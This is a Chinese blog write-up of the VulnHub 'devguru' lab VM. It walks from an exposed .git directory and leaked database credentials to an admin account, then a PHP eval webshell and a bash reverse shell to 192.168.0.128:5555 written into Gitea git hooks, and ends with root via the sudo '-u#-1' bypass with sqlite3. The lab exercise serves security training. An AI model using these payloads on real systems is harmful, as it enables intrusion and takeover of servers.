首页 > 其他分享 >vulnhub-devguru(sudo提权)

vulnhub-devguru(sudo提权)

时间:2024-01-17 15:33:36浏览次数:27  
标签:shell users 登录 访问 sudo 提权 vulnhub

环境准备:

靶机192.168.0.100

攻击机kali192.168.0.128

演示

使用nmap扫描全端口

首先访问80端口

 信息收集发现访问/.git/config存在,使用githack获取源码

 

 

访问adminer.php,为一个mysql的登录界面。

 查找配置文件,找到mysql登录密码。/config/database.php

 登录数据库

 查看users表,原先存在frank用户,密码为加密,手动添加账户,之后修改users_group表将id2分到group1组。

 目录扫描得到登录界面backend

登录后上传shell

 

function onStart(){
     //蚁剑连接
    eval($_POST["pass"]);
    }

使用蚁剑连接,连接后发现为web权限

 上传提权探测脚本,linenum,发现存在备份文件

 

 存在另一个数据库账号密码,使用之前的数据访问界面登录

 进入users表,查找网上资料,将别人加密好的密文拿到,123456,替换frank的密码,之后访问8585端,访问/admin登录

 点击项目进入,在设置下git hooks中点击update后的修改

 将反弹shell命令写入

bash -c "exec bash -i >& /dev/tcp/192.168.0.128/5555 0>&1"

 保存后kali启动监听,在项目中任意修改文件并保存,即可拿到shell

 首先使用sudo -l查看可以使用sudo提权的命令,在https://gtfobins.github.io/中搜索sqlite3

 输入命令后发现提权失败,使用sudo的CVE进行提权

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

 

标签:shell,users,登录,访问,sudo,提权,vulnhub
From: https://www.cnblogs.com/re8sd/p/17970138

相关文章

  • vulnhub-toppo(suid提权sudo提权)
    环境准备靶机192.168.116.138攻击机kali192.168.116.130演示直接访问webadmin目录下存在密码本使用ssh连接,账号ted,密码12345ted123使用项目进行探测LinEnumhttps://github.com/rebootuser/LinEnum 存在python可以使用suid提权使用python反弹shell /usr/b......
  • [FreeBSD]如何在FreeBSD 14.0上使用sudo命令
    Itispossibletousesutoexecutecommandsasroot,forexample%suroot-c'pkginspackage'thenenterrootpassword,oreditsudoersfileandaddyouruser,orgiveaccesstothewheelgroup:execute%suroot-cvisudo,thenuncommentCode:%w......
  • vulnhub下载
    importbs4importrequests#importlogging#logging.basicConfig(level=logging.DEBUG)defsearch_items(keywork:str)->list[str]:resp=Nonetry:resp=requests.get(url="https://vulnhub.com/?q={}".format(keywork))......
  • vulnhub-matrix(cve-2022-0847提权)
    环境准备靶机matrix192.168.116.134攻击机kali192.168.116.130演示启动靶机,使用nmap探测网段nmap192.168.116.0/24 扫描192.168.116.134全端口nmap-p1-65535192.168.116.134 访问网站 扫描目录gobusterdir-uhttp://192.168.116.134/-xphp,bak,tx......
  • vulnhub-lampiao(linux脏牛提权)
    环境准备靶机-lampiao攻击机-kali演示使用nmap探测内网网络,我这里使用NAT网络,网段为192.168.116.0/24nmap192.168.116.0/24发现192.168.116.136存活,扫描全端口nmap-p1-65535192.168.116.136 访问1898端口发现为drupal使用msf来进行攻击searchdrupal......
  • 【渗透测试】Vulnhub Corrosion 1
    渗透环境攻击机:   IP: 192.168.226.129(Kali)靶机:     IP:192.168.226.128靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/进行渗透一、获取端口信息nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。开放了22和80端口,访问8......
  • 【Powershell】域用户提权
    适合人群:适合对Powershell和域有一定基础和感兴趣的运维。课程目标:利用Powershell和计划任务让普通用户能用管理员权限执行程序或脚本课程简介:以往都需要借助收费第三方软件来完成的事情,现在可以通过强大的Powershell完成。利用Powershell和计划任务让普通用户能用管理员权限执行......
  • Ansible - 关于sudo的一些配置
     sudosudo,以超级管理员或其他人的身份执行命令基本流程管理员需要先授权(修改/etc/sudoers文件)普通用户以sudo的形式执行命令可以通过sudo-l查看授权情况配置suddoer:vim/etc/sudoers,进行如下配置,jerry用户可以无需输入密码即以root身份,执行systemctl命令可以切换jerr......
  • vulnhub-symfonos
    symfonos日常练习0x01信息收集老规矩,信息收集,用nmap扫。192.168.56.3存活。因为80端口开着,浏览器打开看看。页面上没有什么有价值的信息,于是尝试路径爆破。dirsearch-u192.168.56.3[10:13:48]301-313B-/manual->http://192.168.56.3/manual/[10:13:48]......
  • 问题1:Ubuntu执行`sudo apt install XXX`报错出现Failed to Fetch
    报错问题:解决方案:1.查看自己Ubuntu的版本:lsb_release-a(LSB是LinuxStandardBase(Linux标准库)的缩写, lsb_release命令 用来与具体Linux发行版相关的Linux标准库信息)获取版本号之后进入:https://mirrors.tuna.tsinghua.edu.cn/help/ubuntu/2.进入网址......